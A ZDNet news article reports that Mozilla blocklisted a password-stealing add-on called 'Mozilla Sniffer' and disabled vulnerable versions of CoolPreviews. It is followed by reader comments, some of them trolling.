Mozilla blacklists password theft add-on

Mozilla blacklists password theft add-on

Summary: Mozilla has yanked a password-stealing browser add-on after the discovery that the add-on contains code that intercepts login data submitted to any website and sends this data to a remote location.

SHARE:
TOPICS: Browser, Security
12

Mozilla has yanked a password-stealing browser add-on after the discovery that the add-on contains code that intercepts login data submitted to any website and sends this data to a remote location.

The add-on, called Mozilla Sniffer," was uploaded to the addons.mozilla.org site on June 6. "Upon discovery on July 12th, the add-on was disabled and added to the blocklist, which will prompt the add-on to be uninstalled for all current users," Mozilla explained.

The intercepted data included user passwords:follow Ryan Naraine on twitter

If a user installs this add-on and submits a login form with a password field, all form data will be submitted to a remote location. Uninstalling the add-on stops this behavior. Anybody who has installed this add-on should change their passwords as soon as possible.

The open-source group said Mozilla Sniffer had been downloaded approximately 1,800 times and reported 334 active daily users.

All current users of the malicious add-on will receive an uninstall notification.

Mozilla Sniffer was not developed by Mozilla, and it was not reviewed by Mozilla. The add-on was in an experimental state, and all users that installed it should have seen a warning indicating it is unreviewed. Unreviewed add-ons are scanned for known viruses, trojans, and other malware, but some types of malicious behavior can only be detected in a code review.

[ SEE: Microsoft exposes Firefox users to drive-by malware downloads ]

Mozilla plans to implement a new security model for addons.mozilla.org that will require all add-ons to be code-reviewed before they are available on the site.

Mozilla said a second add-on, called CoolPreviews, contains a vulnerability that exposes users to hacker attack.

[The] vulnerability can be triggered using a specially crafted hyperlink. If the user hovers the cursor over this link, the preview function executes remote JavaScript code with local chrome privileges, giving the attacking script control over the host computer. Version 3.0.1 and all older versions have been disabled on addons.mozilla.org, and a fixed version was uploaded and reviewed within a day of the developer being notified.

[ SEE: Firefox hit by malicious add-ons ]

"If a user has a vulnerable version installed and clicks on a malicious link that targets the add-on, the code in the malicious link will run with local privileges, potentially gaining access to the file system and allowing code download and execution," the group warned..

About 177,000 users have a vulnerable version of CoolPreviews installed.  Mozilla plans to blacklist the vulnerable versions soon.

Topics: Browser, Security

Kick off your day with ZDNet's daily email newsletter. It's the freshest tech news and opinion, served hot. Get it.

Talkback

12 comments
Log in or register to join the discussion
  • Nope, sorry, I don't believe you ...

    ... I mean, how can this possibly have happened.

    Everyone knows that all OSS is thoroughly reviewed and vetted by all OSS consumers and contributors and that many eyes ensure that no bugs nor deliberate malware can possibly creep into an OSS source tree, right?

    Right.
    de-void-21165590650301806002836337787023
  • Who were...

    the 1800 people who downloaded it, and who are the 334 people who are using it? Why? Is it masked as doing something else? If I uploaded a plug-in called Mozilla Format-your-system-drive, would I actually get people to download and use it?
    hickum
    • RE: Mozilla blacklists password theft add-on

      @hickum
      No doubt, people are stupid.
      ryanstrassburg
    • RE: Mozilla blacklists password theft add-on

      @hickum
      As the original article explains, the add-on was based on Tamper Data - an extension that allows you to view and manipulate HTTP headers of requests made by webpages. It is pretty popular among web developers and security experts. And - yes, it is a sniffer. So when somebody saw an add-on with the same functionality called Mozilla Sniffer it made sense.
      Wladimir Palant
  • Yet another reason to use Safari

    Once again, the Mozilla Foundation gives Apple users yet another reason to use Safari. The plugin model recently adopted by Apple is completely unbreakable, and would never lead to such information loss.
    Trolleur
    • yeah except

      when u use safari with your left hand it fails to load webpages..... unless u wear a glove. nice try
      bspurloc
    • What a farce...

      @Trolleur
      Nothing is unbreakable. But we shall see won't we...
      ryanstrassburg
      • Let me know when there's an exploit....

        @ryanstrassburg

        Please let me know when there is any exploit for Safari extensions, and I'll buy you a beer. In fact, let me know when there's an active exploit for any issue in Mac OS X. The fact of the matter here is that OS X is 100% safe and secure, so long as users don't use third-party software like Firefox.
        Trolleur
      • RE: Mozilla blacklists password theft add-on

        @Trolleur - I sincerely hope that your statements were dripping with disdainful sarcasm. If not, you seriously need a checkup from the neck up.
        de-void-21165590650301806002836337787023
  • RE: Mozilla blacklists password theft add-on

    How stupid can people get? Important passwords are memorised or written down & kept in a safe place (safe or where you keep money) NEVER on a computer!..
    ronangel
    • RE: Mozilla blacklists password theft add-on

      @ronangel - RIGHT ON ... because, as we all know, writing down your passwords on a piece of paper that you stick to the underside of your keyboard or hide in your wallet are utterly secure and will never be stolen.

      On the other hand, storing your passwords ANYWHERE (either electronically or on paper, etc) in plaintext is just silly.
      de-void-21165590650301806002836337787023
  • RE: Mozilla blacklists password theft add-on

    Well done! Thank you very much for professional templates and community edition
    <a href="http://www.yuregininsesi.com">sesli sohbet</a> <a href="http://www.yuregininsesi.com">sesli chat</a>
    yarinsiz